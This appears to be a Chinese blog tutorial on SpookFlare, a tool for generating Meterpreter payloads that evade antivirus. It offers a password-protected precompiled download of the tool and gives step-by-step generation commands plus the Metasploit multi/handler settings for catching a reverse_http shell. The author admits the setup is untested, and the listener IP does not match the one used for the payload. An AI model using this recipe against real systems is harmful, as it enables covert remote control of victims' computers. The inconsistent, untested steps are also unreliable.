SpookFlare – Meterpreter Bypassing

SpookFlare这是一款国外大佬开发的结合MSF生成Windows system 有效载荷的工具.

生成payload分别有两个协议

Http
Https

这两个协议可以根据大家的需求来实现.

接下来我们下载SpookFlare

下载地址:https://github.com/hlldz/SpookFlare

//github 下载下来大家会发现是没有编译过的文件,笔者进行编译过的程序下载(点击下载)密码:r5gd

打开程序按照图解进行操作

1.在kali中执行:ifconfig查看本地IP地址

2.回到windows程序中执行以下命令

help

list

generate

http //协议

192.168.161.146 //kali linux 本地IP地址

8080 //选择任意无冲突的端口

x64 //选择相对于的就好

[*] If you patched Metasploit please enter the byte size or enter 0 (zero).

Stage Patch Size > 0

3.敲回车会得到生成好的payload存放文件位置

[*] Checking values...

[!] Payload successfully generated: C:\Users\A#root\Desktop\Debug\LcBKdxtDKW.exe

4.接下来我们打开kali linux 中的msf进行监听

  • msf > use exploit/multi/handler

  • msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_http
    PAYLOAD => windows/x64/meterpreter/reverse_http

  • msf exploit(handler) > set LHOST 192.168.161.142
    LHOST => 192.168.161.142

  • msf exploit(handler) > set LPORT 8080
    LPORT => 8080

  • msf exploit(handler) > exploit

5.点击运行payload Windows程序,msf就会得到一个shell回话,我这里就没有办法测试就不贴图了

Windows server 2012

Windows server 2008

Windows 10

这三个系统运行payload程序会出现不兼容的情况,具体我也不知道什么原因,多半是net或是编译的时候有什么东西没有弄导致的.